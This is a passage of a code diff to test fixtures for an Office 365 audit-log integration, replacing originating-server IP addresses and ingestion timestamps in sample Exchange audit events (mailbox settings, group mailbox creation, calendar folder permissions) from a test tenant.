bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -7629,12 +7629,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7677,7 +7677,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -7689,8 +7689,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177853600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"e9e580ee-ac04-436f-9214-08d7adfc0d8b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853484400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"e9e580ee-ac04-436f-9214-08d7adfc0d8b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json index db55863833f..f4c97d018ce 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json @@ -2,7 +2,7 @@ "events": [ { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (599b); warming_email_03_2017_conversation.png (614b); warming_email_03_2017_links.png (1403b); google_play_store_badge.png (4824b); apple_store_badge.png (4446b); windows_store_badge.png (3681b); warming_email_03_2017_files.png (809b); warming_email_03_2017_sharePoint.png (1432b)\",\"Id\":\"RgAAAACklF6sEsJgSK/ulVd531/WBwCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAACzgXIUnq3lQqXFeCmxHwmHAAAAABULAAAJ\",\"InternetMessageId\":\"\\u003cAM6PR01MB4535D305187FEC8127CF8EDFEE160@AM6PR01MB4535.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new SIEMTest group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (599b); warming_email_03_2017_conversation.png (614b); warming_email_03_2017_links.png (1403b); google_play_store_badge.png (4824b); apple_store_badge.png (4446b); windows_store_badge.png (3681b); warming_email_03_2017_files.png (809b); warming_email_03_2017_sharePoint.png (1432b)\",\"Id\":\"RgAAAACklF6sEsJgSK/ulVd531/WBwCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAACzgXIUnq3lQqXFeCmxHwmHAAAAABULAAAJ\",\"InternetMessageId\":\"\\u003cAM6PR01MB4535D305187FEC8127CF8EDFEE160@AM6PR01MB4535.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new SIEMTest group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -32,7 +32,7 @@ "Operation": "Create", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "AM6PR01MB4535 (15.20.225.32)\n", + "OriginatingServer": "AM6PR01MB4535 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", @@ -44,7 +44,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:46\",\"ExternalAccess\":true,\"Id\":\"c0790552-9989-4e91-cba4-08d7b386e642\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABQ7FIOAzxlR4hKCRQRbTbvBwBTdQb34omtRrZGvP+4ONQkAAAAAAEMAABTdQb34omtRrZGvP+4ONQkAAAAAA0lAAAJ\",\"InternetMessageId\":\"\\u003cDB3PR0102MB35003D203E5553CBC1B8AAEAE2160@DB3PR0102MB3500.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:46\",\"ExternalAccess\":true,\"Id\":\"c0790552-9989-4e91-cba4-08d7b386e642\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABQ7FIOAzxlR4hKCRQRbTbvBwBTdQb34omtRrZGvP+4ONQkAAAAAAEMAABTdQb34omtRrZGvP+4ONQkAAAAAA0lAAAJ\",\"InternetMessageId\":\"\\u003cDB3PR0102MB35003D203E5553CBC1B8AAEAE2160@DB3PR0102MB3500.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -74,7 +74,7 @@ "Operation": "Create", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "DB3PR0102MB3500 (15.20.225.32)\n", + "OriginatingServer": "DB3PR0102MB3500 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", @@ -86,7 +86,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:31\",\"ExternalAccess\":true,\"Id\":\"c6b58ed7-a54a-47cf-a301-08d7b386dd7c\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABkkJvTy6NaRYV8EL+vMtzZBwAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAk6unHVumCRJNhRrAMRwYLAAAAAAk9AAAJ\",\"InternetMessageId\":\"\\u003cDB7PR01MB442884FC2132AE2A909799BAFC160@DB7PR01MB4428.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:31\",\"ExternalAccess\":true,\"Id\":\"c6b58ed7-a54a-47cf-a301-08d7b386dd7c\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABkkJvTy6NaRYV8EL+vMtzZBwAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAk6unHVumCRJNhRrAMRwYLAAAAAAk9AAAJ\",\"InternetMessageId\":\"\\u003cDB7PR01MB442884FC2132AE2A909799BAFC160@DB7PR01MB4428.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -116,7 +116,7 @@ "Operation": "Create", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "DB7PR01MB4428 (15.20.207.31)\n", + "OriginatingServer": "DB7PR01MB4428 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", @@ -128,7 +128,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"815684be-4e52-4cb2-9242-08d7b386e333\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"815684be-4e52-4cb2-9242-08d7b386e333\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -158,7 +158,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "DB3PR0102MB3500 (15.20.225.32)", + "OriginatingServer": "DB3PR0102MB3500 (67.43.156.13)", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", @@ -170,7 +170,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"f5b56c26-18aa-4984-822e-08d7b386d7e2\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"f5b56c26-18aa-4984-822e-08d7b386d7e2\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -200,7 +200,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "DB7PR01MB4428 (15.20.207.31)\n", + "OriginatingServer": "DB7PR01MB4428 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", @@ -212,7 +212,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"25ccad93-82ad-4742-5231-08d7b386d7e6\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, 